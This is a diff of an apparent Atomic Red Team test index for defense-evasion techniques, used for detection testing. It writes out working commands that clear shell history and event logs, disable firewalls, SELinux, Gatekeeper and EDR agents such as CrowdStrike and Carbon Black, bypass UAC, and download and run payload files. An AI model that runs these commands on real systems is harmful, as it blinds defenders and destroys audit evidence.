prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21869,7 +21869,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -21893,7 +21893,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21904,7 +21904,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21928,7 +21928,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21939,7 +21939,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21964,7 +21964,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21975,7 +21975,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22000,7 +22000,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -22011,7 +22011,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -22093,7 +22093,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands -' + ' supported_platforms: - windows input_arguments: @@ -22105,24 +22105,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) -' + ' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} -' + ' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file -' + ' supported_platforms: - windows input_arguments: @@ -22134,17 +22134,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) -' + ' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au -' + ' name: command_prompt T1574.012: technique: 
@@ -22255,7 +22255,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22300,7 +22300,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22338,7 +22338,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -22422,71 +22422,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm -' + ' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history -' + ' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm -' + ' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history -' + ' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history -' + ' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history -' + ' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate -' + ' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history -' + ' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero -' + ' supported_platforms: - linux - macos @@ -22501,7 +22501,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions -' + ' supported_platforms: - linux - macos @@ -22521,7 +22521,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file -' + ' supported_platforms: - linux - macos 
@@ -22536,13 +22536,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog -' + ' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting -' + ' prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n" get_prereq_command: | @@ -22552,35 +22552,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname -' + ' cleanup_command: 'userdel -f testuser1 -' + ' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history -' + ' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing -' + ' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history -' + ' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath -' + ' name: powershell T1070.002: technique: @@ -22631,7 +22631,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs -' + ' supported_platforms: - macos - linux @@ -22647,7 +22647,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -22658,14 +22658,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} -' + ' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: 
@@ -22676,7 +22676,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} -' + ' name: bash T1070.001: technique: @@ -22744,7 +22744,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. -' + ' supported_platforms: - windows input_arguments: @@ -22755,7 +22755,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} -' + ' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -22784,7 +22784,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -22794,7 +22794,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -22865,7 +22865,7 @@ defense-evasion: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -22900,20 +22900,20 @@ defense-evasion: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1553.002: technique: external_references: 
@@ -23160,10 +23160,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -23171,10 +23171,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} -' + ' cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef @@ -23196,24 +23196,24 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} -' + ' executor: command: 'Invoke-Expression #{input_file} -' + ' name: powershell - name: C compile auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57 description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23226,14 +23226,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: | gcc #{input_file} && ./a.out 
@@ -23243,7 +23243,7 @@ defense-evasion: auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23256,14 +23256,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: | g++ #{input_file} && ./a.out @@ -23273,7 +23273,7 @@ defense-evasion: auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52 description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23286,18 +23286,18 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: 'go run #{input_file} -' + ' name: bash T1218.001: technique: 
@@ -23377,17 +23377,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) -' + ' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} -' + ' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -23404,7 +23404,7 @@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} -' + ' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -23430,7 +23430,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23463,7 +23463,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23488,7 +23488,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -23529,7 +23529,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath 
@@ -23568,7 +23568,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23721,17 +23721,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) -' + ' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} -' + ' name: command_prompt T1578.002: technique: @@ -24082,10 +24082,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -24093,7 +24093,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -24213,7 +24213,7 @@ defense-evasion: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -24224,10 +24224,10 @@ defense-evasion: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1578.003: 
@@ -24366,7 +24366,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) -' + ' supported_platforms: - windows input_arguments: @@ -24389,7 +24389,7 @@ defense-evasion: description: 'Use Python to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24405,13 +24405,13 @@ defense-evasion: dependencies: - description: 'Python must be present -' + ' prereq_command: 'which python3 -' + ' get_prereq_command: 'echo "Please install Python 3" -' + ' executor: name: sh elevation_required: false @@ -24428,7 +24428,7 @@ defense-evasion: description: 'Use Perl to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24444,13 +24444,13 @@ defense-evasion: dependencies: - description: 'Perl must be present -' + ' prereq_command: 'which perl -' + ' get_prereq_command: 'echo "Please install Perl" -' + ' executor: name: sh elevation_required: false @@ -24464,7 +24464,7 @@ defense-evasion: description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24495,7 +24495,7 @@ defense-evasion: description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24511,13 +24511,13 @@ defense-evasion: dependencies: - description: 'xxd must be present -' + ' prereq_command: 'which xxd -' + ' get_prereq_command: 'echo "Please install xxd" -' + ' executor: name: sh elevation_required: false @@ -24750,7 +24750,7 @@ defense-evasion: description: 'Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail -' + ' supported_platforms: - iaas:aws input_arguments: 
@@ -24769,7 +24769,7 @@ defense-evasion: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured -' + ' prereq_command: | cat ~/.aws/credentials | grep "default" aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} @@ -24777,7 +24777,7 @@ defense-evasion: get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure -' + ' executor: command: | aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} @@ -24884,7 +24884,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true -' + ' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -24959,10 +24959,10 @@ defense-evasion: executor: command: 'wevtutil sl "#{log_name}" /e:false -' + ' cleanup_command: 'wevtutil sl "#{log_name}" /e:true -' + ' name: command_prompt T1562.007: technique: @@ -25062,10 +25062,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off -' + ' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 -' + ' name: command_prompt - name: Disable Microsoft Defender Firewall via Registry auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 @@ -25078,11 +25078,11 @@ defense-evasion: command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f -' + ' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 
@@ -25097,7 +25097,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 -' + ' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 @@ -25156,27 +25156,27 @@ defense-evasion: auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: 'Stop the Uncomplicated Firewall (UFW) if installed. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if ufw is installed on the machine. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'ufw disable -' + ' cleanup_command: | ufw enable ufw status verbose @@ -25190,7 +25190,7 @@ defense-evasion: dependencies: - description: 'Check if systemctl and ufw is installed on the machine. -' + ' prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; @@ -25198,13 +25198,13 @@ defense-evasion: ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'systemctl stop ufw -' + ' cleanup_command: | systemctl start ufw systemctl status ufw 
@@ -25217,20 +25217,20 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'ufw logging off -' + ' cleanup_command: | ufw logging low ufw status verbose @@ -25244,14 +25244,14 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25265,21 +25265,21 @@ defense-evasion: auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if /etc/ufw/user.rules exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25288,7 +25288,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules -' + ' - name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf 
@@ -25299,14 +25299,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/ufw.conf exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25326,14 +25326,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/sysctl.conf exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25353,14 +25353,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/default/ufw exists. -' + ' prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25369,7 +25369,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw -' + ' - name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log @@ -25380,20 +25380,20 @@ defense-evasion: dependencies: - description: 'Check if /var/log/ufw.log exists. -' + ' prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'tail /var/log/ufw.log -' + ' cleanup_command: '' T1562.001: technique: @@ -25458,7 +25458,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection -' + ' supported_platforms: - linux input_arguments: 
@@ -25487,11 +25487,11 @@ defense-evasion: dependencies: - description: 'Package with rsyslog must be on system -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: "#{flavor_command}\n" @@ -25502,7 +25502,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service -' + ' supported_platforms: - linux executor: @@ -25520,23 +25520,23 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement -' + ' supported_platforms: - linux executor: command: 'setenforce 0 -' + ' cleanup_command: 'setenforce 1 -' + ' name: sh elevation_required: true - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux -' + ' supported_platforms: - linux executor: @@ -25552,7 +25552,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response -' + ' supported_platforms: - macos executor: 
@@ -25568,48 +25568,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper -' + ' supported_platforms: - macos executor: command: 'sudo spctl --master-disable -' + ' cleanup_command: 'sudo spctl --master-enable -' + ' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS @@ -25617,7 +25617,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS -' + ' supported_platforms: - macos input_arguments: 
@@ -25655,40 +25655,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded -' + ' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed -' + ' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded -' + ' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} -' + ' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -25700,7 +25700,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion -' + ' supported_platforms: - windows input_arguments: @@ -25713,10 +25713,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available -' + ' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} -' + ' 